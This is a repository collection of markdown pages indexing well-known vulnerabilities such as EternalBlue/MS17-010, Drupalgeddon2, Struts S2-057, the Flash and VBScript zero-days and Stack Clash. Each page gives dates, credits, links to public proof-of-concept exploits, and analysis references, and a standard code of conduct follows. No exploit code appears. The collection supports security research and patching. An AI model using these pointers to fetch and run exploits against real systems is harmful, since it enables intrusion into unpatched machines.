CVE-2018-11235 2 | 3 | - Report: May 18, 2018 4 | - Credit: [Etienne Stalmans](https://twitter.com/_staaldraad) 5 | 6 | ## PoC 7 | 8 | - [Rogdham/CVE-2018-11235](https://github.com/Rogdham/CVE-2018-11235) 9 | - [Git < 2.17.1 - Remote Code Execution](https://www.exploit-db.com/exploits/44822/) 10 | 11 | ## Reference 12 | 13 | - [CVE-2018-11235 git RCE](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/) 14 | - [CVE-2018-11235](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11235) 15 | -------------------------------------------------------------------------------- /CVE-2018-11776.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-11776, which is also known as S2-057 2 | 3 | - Report: Apr 2018 4 | - Credit: Man Yue Mo from [lgtm.com](https://t.co/zSHT5ex92f) 5 | 6 | ## PoC 7 | 8 | - [mazen160/struts-pwn_CVE-2018-11776](https://github.com/mazen160/struts-pwn_CVE-2018-11776) 9 | 10 | ## Reference 11 | 12 | - [CVE-2018-11776: How to find 5 RCEs in Apache Struts with Semmle QL](https://lgtm.com/blog/apache_struts_CVE-2018-11776) 13 | - [Semmle Discovers Critical Remote Code Execution Vulnerability in Apache Struts (CVE-2018-11776)](https://semmle.com/news/apache-struts-CVE-2018-11776) 14 | -------------------------------------------------------------------------------- /CVE-2018-4878.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-4878 2 | 3 | - Report: Feb 6 2018 4 | - Credit: KrCERT/CC 5 | 6 | ## PoC 7 | 8 | - [InQuest/malware-samples](https://github.com/InQuest/malware-samples/tree/master/CVE-2018-4878-Adobe-Flash-DRM-UAF-0day) 9 | - [Flash 0day (CVE-2018-4878): from PoC to exploitation](https://mp.weixin.qq.com/s/F2N04exaW8QO1IeHRZgmfg) 10 | - [Adobe Flash Exploitation, Then and Now: From CVE-2015-5119 to CVE-2018-4878](https://www.mdsec.co.uk/2018/02/adobe-flash-exploitation-then-and-now-from-cve-2015-5119-to-cve-2018-4878/) 11 | 12 | ## Reference 13 | 14 | - 
[CVE-2018-4878 (Flash Player up to 28.0.0.137) and Exploit Kits](https://malware.dontneedcoffee.com/2018/03/CVE-2018-4878.html) 15 | - [North Korean Hackers Allegedly Exploit Adobe Flash Player Vulnerability (CVE-2018-4878) Against South Korean Targets](https://www.trendmicro.com/vinfo/us/security/news/vulnerabilities-and-exploits/north-korean-hackers-allegedly-exploit-adobe-flash-player-vulnerability-cve-2018-4878-against-south-korean-targets) 16 | - [Security Notice | Resources - KISA Internet Bohonara & KrCERT](https://www.krcert.or.kr/data/secNoticeView.do?bulletin_writing_sequence=26998) 17 | - [Adobe Security Advisory](https://helpx.adobe.com/security/products/flash-player/apsa18-01.html) 18 | - [CVE-2018-4878](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-4878) 19 | -------------------------------------------------------------------------------- /CVE-2018-7600.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-7600 2 | 3 | - Report: Mar 28 2018 4 | - Credit: [Jasper Mattsson](https://www.drupal.org/u/Jasu_M) 5 | 6 | ## PoC 7 | 8 | - [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2) 9 | - [Remote Code Execution with Drupal core (SA-CORE-2018–002)](https://blog.appsecco.com/remote-code-execution-with-drupal-core-sa-core-2018-002-95e6ecc0c714) 10 | - [Uncovering Drupalgeddon 2](https://research.checkpoint.com/uncovering-drupalgeddon-2/) 11 | - [Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution (Metasploit)](https://www.exploit-db.com/exploits/44482/) 12 | 13 | ## Reference 14 | 15 | - [Drupalgeddon Two. 
- New Drupal Vulnerability in Detail](https://lab.wallarm.com/drupalgeddon-two-81d1b424aa18) 16 | - [https://twitter.com/bendiken/status/979076199875006465](https://twitter.com/bendiken/status/979076199875006465) 17 | - [Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002](https://www.drupal.org/sa-core-2018-002) 18 | - [CVE-2018-7600](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-7600) 19 | -------------------------------------------------------------------------------- /CVE-2018-8174.md: -------------------------------------------------------------------------------- 1 | # CVE-2018-8174 2 | 3 | - Report: Mar 28 2018 4 | - Credit: Ding Maoyin, Jinquan, Song Shenlei, and Yang Kang @ [Qihoo 360 Core Security](https://www.360.cn/) 5 | 6 | ## PoC 7 | 8 | - [smgorelik/Windows-RCE-exploits](https://github.com/smgorelik/Windows-RCE-exploits/tree/master/Web/VBScript) 9 | - [0x09AL/CVE-2018-8174-msf](https://github.com/0x09AL/CVE-2018-8174-msf) 10 | 11 | ## Reference 12 | 13 | - [Dissecting modern browser exploit: case study of CVE-2018–8174](https://medium.com/@florek/dissecting-modern-browser-exploit-case-study-of-cve-2018-8174-1a6046729890) 14 | - [Delving deep into VBScript - Analysis of CVE-2018-8174 exploitation](https://securelist.com/delving-deep-into-vbscript-analysis-of-cve-2018-8174-exploitation/86333/) 15 | - [Analysis of CVE-2018-8174 VBScript 0day and APT actor related to Office targeted attack](http://blogs.360.cn/blog/cve-2018-8174-en/) 16 | - [CVE-2018-8174](http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8174) 17 | -------------------------------------------------------------------------------- /MS17-010.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-0143 ~ CVE-2017-0148 2 | 3 | - Report: April 14, 2017 4 | 5 | ## PoC 6 | 7 | - [RiskSense-Ops/MS17-010](https://github.com/RiskSense-Ops/MS17-010) 8 | - [Eternalblue exploit for Windows 
8/2012](https://gist.github.com/worawit/074a27e90a3686506fc586249934a30e) 9 | - [Eternalblue exploit for Windows 7/2008](https://gist.github.com/worawit/bd04bad3cd231474763b873df081c09a) 10 | - [eternalblue poc](https://gist.github.com/worawit/d698983c11825a9855a62a1dfbf757ca) 11 | - [worawit/MS17-010](https://github.com/worawit/MS17-010) 12 | - [ElevenPaths/Eternalblue-Doublepulsar-Metasploit](https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit) 13 | 14 | ## Reference 15 | 16 | - [Microsoft Security Bulletin MS17-010 - Critical](https://technet.microsoft.com/en-us/library/security/ms17-010.aspx) 17 | - [Eternal Champion Exploit Analysis](https://blogs.technet.microsoft.com/srd/2017/06/29/eternal-champion-exploit-analysis/) 18 | - [Wannacrypt0r-FACTSHEET](https://gist.github.com/rain-1/989428fa5504f378b993ee6efbc0b168) 19 | - [[Authoritative Report] Complete analysis report on the WanaCrypt0r ransomware worm](http://bobao.360.cn/learning/detail/3853.html) 20 | - [Massive WannaCry/Wcry Ransomware Attack Hits Various Countries](http://blog.trendmicro.com/trendlabs-security-intelligence/massive-wannacrywcry-ransomware-attack-hits-various-countries/) 21 | - [INTEZER - WannaCry Ransomware: Potential Link to North Korea](http://www.intezer.com/wp-content/uploads/2017/05/Intezer_WannaCry.pdf) 22 | - [DoublePulsar Initial SMB Backdoor Ring 0 Shellcode Analysis](https://zerosum0x0.blogspot.tw/2017/04/doublepulsar-initial-smb-backdoor-ring.html) 23 | - [ANALYZING THE DOUBLEPULSAR KERNEL DLL INJECTION TECHNIQUE](https://countercept.com/our-thinking/analyzing-the-doublepulsar-kernel-dll-injection-technique/) 24 | - [MS17-010 SMB RCE Detection](https://www.rapid7.com/db/modules/auxiliary/scanner/smb/smb_ms17_010) 25 | - [A python2 script for sweeping a network to find windows systems compromised with the DOUBLEPULSAR implant.](https://github.com/countercept/doublepulsar-detection-script) 26 | - [NSA Eternalblue SMB vulnerability analysis](http://blogs.360.cn/360safe/2017/04/17/nsa-eternalblue-smb/) 27 | 
-------------------------------------------------------------------------------- /Stack-Clash.md: -------------------------------------------------------------------------------- 1 | # CVE-2017-1082, CVE-2017-1083, CVE-2017-1084, CVE-2017-1085, CVE-2017-3629, CVE-2017-3630, CVE-2017-3631, CVE-2017-1000364, CVE-2017-1000365, CVE-2017-1000366, CVE-2017-1000367, CVE-2017-1000369, CVE-2017-1000370, CVE-2017-1000371, CVE-2017-1000372, CVE-2017-1000373, CVE-2017-1000374, CVE-2017-1000375, CVE-2017-1000376, CVE-2017-1000377, CVE-2017-1000378, CVE-2017-1000379 2 | 3 | - Report: Jun 19, 2017 4 | - Credit: [Qualys Corporation](https://www.qualys.com/) 5 | 6 | ## PoC 7 | 8 | ### CVE-2017-1084 9 | 10 | - [FreeBSD - 'FGPE' Stack Clash (PoC)](https://www.exploit-db.com/exploits/42277/) 11 | - [FreeBSD - 'FGPU' Stack Clash (PoC)](https://www.exploit-db.com/exploits/42278/) 12 | 13 | ### CVE-2017-1085 14 | 15 | - [FreeBSD - 'setrlimit' Stack Clash (PoC)](https://www.exploit-db.com/exploits/42279/) 16 | 17 | ### CVE-2017-3629, CVE-2017-3630, CVE-2017-3631 18 | 19 | - [Oracle Solaris 11.1/11.3 (RSH) - Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42270/) 20 | 21 | ### CVE-2017-1000366, CVE-2017-1000370 22 | 23 | - [Linux Kernel (Debian 7/8/9/10 / Fedora 23/24/25 / CentOS 5.3/5.11/6.0/6.8/7.2.1511) - 'ldso_hwcap' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42274/) 24 | 25 | ### CVE-2017-1000366, CVE-2017-1000371 26 | 27 | - [Linux Kernel (Debian 9/10 / Ubuntu 14.04.5/16.04.2/17.04 / Fedora 23/24/25) - 'ldso_dynamic' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42276/) 28 | 29 | ### CVE-2017-1000366, CVE-2017-1000379 30 | 31 | - [Linux Kernel (Debian 7.7/8.5/9.0 / Ubuntu 14.04.2/16.04.2/17.04 / Fedora 22/25 / CentOS 7.3.1611) - 'ldso_hwcap_64' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42275/) 32 | 33 | ### 
CVE-2017-1000367 34 | 35 | - [Sudo - 'get_process_ttyname()' Privilege Escalation](https://www.exploit-db.com/exploits/42183/) 36 | - [c0d3z3r0/sudo-CVE-2017-1000367](https://github.com/c0d3z3r0/sudo-CVE-2017-1000367) 37 | 38 | ### CVE-2017-1000370, CVE-2017-1000371 39 | 40 | - [Linux Kernel - 'offset2lib' 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42273/) 41 | 42 | ### CVE-2017-1000373 43 | 44 | - [OpenBSD - 'at' Local Privilege Escalation 'Stack Clash' Exploit](https://www.exploit-db.com/exploits/42271/) 45 | 46 | ### CVE-2017-1000375 47 | 48 | - [NetBSD - 'Stack Clash' (PoC)](https://www.exploit-db.com/exploits/42272/) 49 | 50 | ## Reference 51 | 52 | - [stack-clash.txt](https://www.qualys.com/2017/06/19/stack-clash/stack-clash.txt) 53 | - [A Decade Old Unix/Linux/BSD Root Privilege-Escalation Bug Discovered](http://thehackernews.com/2017/06/linux-root-privilege-escalation.html) 54 | - [CVE-2017-1000367 in Sudo's get_process_ttyname() for Linux](https://www.qualys.com/2017/05/30/cve-2017-1000367/cve-2017-1000367.txt) 55 | - [Linux security alert: Bug in sudo’s get_process_ttyname() [ CVE-2017-1000367 ]](https://www.cyberciti.biz/security/linux-security-alert-bug-in-sudos-get_process_ttyname-cve-2017-1000367/) 56 | -------------------------------------------------------------------------------- /code-of-conduct.md: -------------------------------------------------------------------------------- 1 | # Contributor Covenant Code of Conduct 2 | 3 | ## Our Pledge 4 | 5 | In the interest of fostering an open and welcoming environment, we as 6 | contributors and maintainers pledge to making participation in our project and 7 | our community a harassment-free experience for everyone, regardless of age, body 8 | size, disability, ethnicity, gender identity and expression, level of experience, 9 | nationality, personal appearance, race, religion, or sexual identity and 10 | orientation. 
11 | 12 | ## Our Standards 13 | 14 | Examples of behavior that contributes to creating a positive environment 15 | include: 16 | 17 | * Using welcoming and inclusive language 18 | * Being respectful of differing viewpoints and experiences 19 | * Gracefully accepting constructive criticism 20 | * Focusing on what is best for the community 21 | * Showing empathy towards other community members 22 | 23 | Examples of unacceptable behavior by participants include: 24 | 25 | * The use of sexualized language or imagery and unwelcome sexual attention or 26 | advances 27 | * Trolling, insulting/derogatory comments, and personal or political attacks 28 | * Public or private harassment 29 | * Publishing others' private information, such as a physical or electronic 30 | address, without explicit permission 31 | * Other conduct which could reasonably be considered inappropriate in a 32 | professional setting 33 | 34 | ## Our Responsibilities 35 | 36 | Project maintainers are responsible for clarifying the standards of acceptable 37 | behavior and are expected to take appropriate and fair corrective action in 38 | response to any instances of unacceptable behavior. 39 | 40 | Project maintainers have the right and responsibility to remove, edit, or 41 | reject comments, commits, code, wiki edits, issues, and other contributions 42 | that are not aligned to this Code of Conduct, or to ban temporarily or 43 | permanently any contributor for other behaviors that they deem inappropriate, 44 | threatening, offensive, or harmful. 45 | 46 | ## Scope 47 | 48 | This Code of Conduct applies both within project spaces and in public spaces 49 | when an individual is representing the project or its community. Examples of 50 | representing a project or community include using an official project e-mail 51 | address, posting via an official social media account, or acting as an appointed 52 | representative at an online or offline event. 
Representation of a project may be 53 | further defined and clarified by project maintainers. 54 | 55 | ## Enforcement 56 | 57 | Instances of abusive, harassing, or otherwise unacceptable behavior may be 58 | reported by contacting the project team at boik@tdohacker.org. All 59 | complaints will be reviewed and investigated and will result in a response that 60 | is deemed necessary and appropriate to the circumstances. The project team is 61 | obligated to maintain confidentiality with regard to the reporter of an incident. 62 | Further details of specific enforcement policies may be posted separately. 63 | 64 | Project maintainers who do not follow or enforce the Code of Conduct in good 65 | faith may face temporary or permanent repercussions as determined by other 66 | members of the project's leadership. 67 | 68 | ## Attribution 69 | 70 | This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, 71 | available at [http://contributor-covenant.org/version/1/4][version] 72 | 73 | [homepage]: http://contributor-covenant.org 74 | [version]: http://contributor-covenant.org/version/1/4/ 75 | --------------------------------------------------------------------------------